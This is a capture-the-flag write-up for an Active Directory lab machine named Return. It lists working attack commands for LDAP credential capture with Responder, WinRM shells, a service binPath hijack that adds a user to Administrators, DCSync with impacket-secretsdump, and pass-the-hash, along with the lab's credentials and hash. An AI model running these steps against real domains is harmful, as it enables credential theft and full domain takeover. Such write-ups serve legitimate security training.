Overview
Return is an Active Directory machine that demonstrates how a misconfigured printer administration panel can expose stored LDAP credentials, leading to WinRM access and eventual domain compromise through Server Operators group abuse.
Attack Chain
- Enumerate exposed Active Directory services
- Identify the
return.localdomain through LDAP - Discover a printer administration panel on HTTP
- Modify the LDAP server setting to point to the attacking machine
- Capture cleartext credentials with
Responder - Validate
svc-printercredentials and gain WinRM access - Enumerate group membership and identify
Server Operators - Abuse service control permissions to add
svc-printerto local Administrators - Perform DCSync with
impacket-secretsdump - Authenticate as Administrator using pass-the-hash
Enumeration
Port Scanning
We start by defining the target and running a full TCP port scan to identify exposed services.
export IP=10.129.51.160; export NAME=RETURN; echo $IP; echo $NAME; ping $IP -c 1
nmap --min-rate 4500 --max-rtt-timeout 1500ms $IP -Pn -n -p- -v -oA scans/nmap_allports_$NAME
ports=$(cat scans/nmap_allports_$NAME.nmap | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); echo $ports
nmap $IP -p$ports -Pn --disable-arp-ping -sC -sV -oA scans/nmap_initial_$NAME -v
The open TCP ports are:
53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,59260
Findings
The scan results show a typical Active Directory attack surface. DNS (53), Kerberos (88), RPC (135), SMB (139, 445), LDAP (389, 636), and the Global Catalog ports 3268 and 3269 are exposed. WinRM over HTTPS is also available on port 5986, which may become useful once valid credentials are found.
LDAP Enumeration
To confirm the domain name, we query LDAP for the base naming contexts.
ldapsearch -H ldap://$IP -x -s base namingcontexts
The LDAP response identifies the domain as return.local, so we add it to /etc/hosts for proper name resolution.
echo "$IP return.local" | sudo tee -a /etc/hosts
Web Enumeration
Printer Administration Panel
Browsing to the web service reveals a static printer administration panel.
The settings page is more interesting. It contains printer configuration values and exposes a username, svc-printer, in the LDAP configuration.
Because the page allows the LDAP server value to be updated, we can try pointing it back to our attacking machine and observe whether the application attempts to authenticate.
Foothold
Capturing LDAP Credentials
We start Responder in analysis mode to listen for incoming authentication attempts.
sudo responder -I tun0 -A
Next, we update the printer settings so that the LDAP server points to our attacking machine.
The target connects back and sends the stored credentials in cleartext.
The captured credentials are:
svc-printer:1edFg43012!!
Validating Access
With credentials for svc-printer, we first check whether the account has access to any useful SMB shares.
nxc smb $IP -u 'svc-printer' -p '1edFg43012!!' --shares
Nothing immediately stands out over SMB, so we test for WinRM access.
nxc winrm $IP -u 'svc-printer' -p '1edFg43012!!'
WinRM access is allowed, so we establish an interactive shell with evil-winrm.
evil-winrm -i $IP -u 'svc-printer' -p '1edFg43012!!'
This gives us an interactive shell as svc-printer.
The user flag can now be read.
type C:\Users\svc-printer\Desktop\user.txt
Privilege Escalation
User & Group Enumeration
After gaining access as svc-printer, we enumerate the domain user to review group membership.
net user svc-printer /domain
The account is a member of both Print Operators and Server Operators. Server Operators is the key group here, because members can manage local services on a domain controller.
We also review the assigned privileges and see that SeBackupPrivilege and SeRestorePrivilege are enabled. In this path, the important takeaway is that the account can control services, allowing us to modify a service binary path and execute a command with elevated privileges.
Service Abuse
We list available services from the evil-winrm session.
services
The VMTools service is selected as the target.
Instead of using a reverse shell payload, we modify the VMTools service binary path so that it adds svc-printer to the local Administrators group when the service starts.
cmd /c 'sc config VMTools binPath= "cmd /c net localgroup Administrators svc-printer /add"'
We stop the service.
cmd /c "sc stop VMTools"
Then start it again to trigger the modified command.
cmd /c "sc start VMTools"
To confirm the attack worked, we check the local Administrators group.
net localgroup Administrators
svc-printer is now a member of the local Administrators group.
DCSync
With administrative access on the domain controller, we can perform a DCSync attack from the attacking machine using impacket-secretsdump.
impacket-secretsdump -outputfile creds/return.hashes -just-dc return.local/svc-printer:'1edFg43012!!'@$IP
The dump returns the Administrator hash.
We verify the hash with netexec.
nxc winrm $IP -u 'Administrator' -H 'aad3b435b51404eeaad3b435b51404ee:32db622ed9c00dd1039d8288b0407460'
The hash is valid for WinRM authentication.
Administrator Access
With the hash confirmed, we authenticate with evil-winrm using pass-the-hash.
evil-winrm -i $IP -u 'Administrator' -H '32db622ed9c00dd1039d8288b0407460'
The root flag can now be read.
type C:\Users\Administrator\Desktop\root.txt
Key Takeaways
Return shows how a seemingly simple printer configuration page can expose highly sensitive credentials. By redirecting LDAP authentication to an attacker-controlled host, cleartext service credentials were captured and reused for WinRM access. The final escalation came from Server Operators, where service control rights allowed the compromised account to become a local administrator and perform DCSync for full domain compromise.